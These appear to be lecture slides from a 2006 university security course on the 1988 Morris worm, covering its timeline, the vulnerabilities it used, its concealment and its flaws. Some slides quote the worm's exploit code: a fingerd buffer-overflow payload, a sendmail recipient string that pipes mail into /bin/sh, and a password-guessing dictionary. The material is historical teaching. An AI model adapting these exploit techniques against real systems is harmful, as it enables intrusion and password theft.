150 likes | 173 Views
The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006. “ There may be a virus loose on the internet “ Andy Sudduth of Harvard, 34 minutes after midnight, Nov. 3, 1988. Creator and His Creation. November 2nd, 1988:
E N D
The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth of Harvard, 34 minutes after midnight, Nov. 3, 1988
Creator and His Creation • November 2nd, 1988: Robert Tappan Morris, 23-year old cs student from Cornell released a worm from MIT. Aside:son of Robert Morris, Sr. Chief Scientist at the National Computer Security Center, subdivision of NSA • The Morris worm: Consisted of several files of cleverly-written C code • Intentions: Probe the size of Internet with a self-replicating program ? • Effects: -- Internet down -- Thousands of machines disconnected from Internet -- Worm on the loose
What the worm DID NOT do: • Did not cause physical damage to computer systems. • Did not alter or destroy system or user files • Did not affect machines running OSs other than VAX or BSD Unix • Did not save or transmit the cracked passwords • Did not attempt to gain superuser access • Did not plant any trojans or timebombs • Did not attack machines that were not attached to the internet
What the worm DID: • Self-propagated through Internet infecting and reinfecting machines • Self-replicated unstoppably • Explored several vulnerabilities: fingerd, sendmail, passwords • Had flaws that made it especially destructive, and/or impaired the intended functionality • Cracked user passwords • Disguised itself by several clever means
History and Origins • “Worms were good at first”: • Noble usage • 1975: “tapeworm” John Brunner’s The Shockwave Rider • early 1980s: John Shoch, Jon Hupp created five worms for executing helpful tasks on the internet: billboard worm, vampire worm, etc.: “ a useful way to run distributed diagnostics” • Mishap and the first lesson learned • Conclusions We have the tools at hand to experiment with distributed computations in their fullest form: dynamically allocating resources and moving from machine to machine. Furthermore, local networks supporting relatively large numbers of hosts now provide a rich environment for this kind of experimentation. The basic worm programs described here demonstrate the ease with which these mechanisms can be explored… (J. Shoch, J. Hupp)
The Horrible Night 6:00 PM The Worm is launched 8:49 PM The Worm infects a VAX-8600 at the University of Utah 9:09 PM The Worm initiates the first attack to infect others 9:21 PM Load average on the system reaches 5 (sh be 1) 9:41 PM Load average reaches 7 10:01 PM Load average reaches 16 10:06 PM No new processes can be started. System unusable 10:20 PM System administrator kills off the worms 10:41 PM System is reinfected, load average reaches 27 10:49 PM System administrator shuts down and restarts the system 11:21 PM Reinfestation causes load average to reach 37.
fingerd Vulnerability Exploited • fingerd has a 512 char buffer • worm calls write() with 536 char + newline argument • 6 words overwrite system stack including return PC, that makes a system • call version of execve(“/bin/sh”)that installs the worm on the target system. • char buf[536] = "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003 • \320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351"; • /* Rewrite part of the stack frame */ • l556 = 0x7fffe9fc; l560 = 0x7fffe8a8; l564 = 0x7fffe8bc; • l568 = 0x28000000; l552 = 0x0001c020; • #ifdef sun /* Reverse the word order for the Sun machines*/ • l556 = byte_swap(l556); l560 = byte_swap(l560); l564 = byte_swap(l564); • l568 = byte_swap(l568); l552 = byte_swap(l552); • #endif sun • write(s, buf, sizeof(buf)); /* sizeof == 536 */ • write(s, XS("\n"), 1); • sleep(5); • if (test_connection(s, s, 10)) { • *fd1 = s; *fd2 = s;return 1; • }
sendmail Vulnerability Exploited • TCP flaw - DEBUG flag allows to send mail to a process instead of user. • Worm sends message with DEBUG flad to a cleverly built recepient, • String sets up command deleting header, passes body to command interpreter. • It will compile code that opens a connection and gets a copy of the worm • #define MAIL_FROM "mail from:</dev/null>\n" • #define MAIL_RCPT "rcpt to:<\"| sed \'1,/^$/d\' | /bin/sh ; exit 0\">\n" • send_text(s, XS(MAIL_FROM)); • sprintf(l548, XS(MAIL_RCPT), i, i); • send_text(s, l548); • send_text(s, XS("data\n")); • compile_slave(host, s, saddr); • send_text(s, XS("\n.\n")); • send_text(s, XS("quit\n"));
Password Cracking • Exploited 2 vulnerabilities: • System: /etc/passwd file • User: weak passwords • Attack has 4 stages: • 0: seek other machines to infect from /etc/hosts.equiv and /.rhosts • 1: obvious password guesses (35% success) • 2: worm’s internal dictionary • 3: system’s online dictionary in /usr/dict/words
Worm’s dictionary char *wds[ ] = /* 0x21a74 */ {"academia", "aerobics", "airplane", "albany", "albatross", "albert", "alex", "alexander", "algebra", "aliases", "alphabet", "amorphous", "analog", "anchor", "andromache", "animals", "answer", "anthropogenic", "anvils", "anything", "aria", "ariadne", "arrow", "arthur", "athena", "atmosphere", "aztecs", "azure", "bacchus", "bailey", "banana", "bananas", "bandit", "banks", "barber", "baritone", "bass", "bassoon", "batman", "beater", "beauty", "beethoven", "beloved", "benz", "beowulf", "berkeley", "berliner", "beryl", "beverly", "bicameral", "brenda", "brian", "bridget", "broadway", "bumbling", "burgess", "campanile", "cantor", "cardinal", . . . "tarragon", "taylor", "telephone", "temptation", "thailand", "tiger", "toggle", "tomato", "topography", "tortoise", "toyota", "trails", "trivial", "trombone", "tubas", "tuttle", "umesh", "unhappy", "unicorn", "unknown", "urchin", "utility", "vasant", "vertigo", "vicky", "village", "virginia", "warren", "water", "weenie", "whatnot", "whiting", "whitney", "will", "william", "williamsburg", "willie", "winston", "wisconsin", "wizard", "wombat", "woodwind", "wormwood", "yacov", "yang", "yellowstone", "yosemite", "zimmerman", 0 }; /* contained 421 words*/
Concealing Itself • Rename itself to sh, which is also the name of the Bourne shell strcpy(argv[0], XS("sh")); • Set core dump size to zero: rl.rlim_cur = 0; rl.rlim_max = 0; if (setrlimit(RLIMIT_CORE, &rl)) ; • Deleting parent process and manipulating process id • Used encryption
Oops, … The Worm Had Flaws • Major flaws in the program code: • only ≈14% chance that the worm will check if the target system has already been infected • 1 in 7 chance (instead of 1 in 10,000) that listening worm will not listen for a pleasequit() signal • Used TCP socket command sendto instead of the UDP send to send 1B of data from each machine to the originating Berkely machine 128.32.137.13 port 11357 • There were other flaws as well
Worm Map [from http://snowplow.org/tom/worm/history.html]
Lessons Learned • The Morris Worm was the first worm to bring Internet down • Worm is a powerful tool capable of inflicting a lot of damage • Computer crime is punishable under the Computer Fraud and Abuse Act of 1986. • Later Mr. Morris himself stated that the incident “has raised the public awareness to a considerable degree”. [R H Morris, quoted in the New York Times 11/5/88]. • System administrators increased their efforts in protecting their systems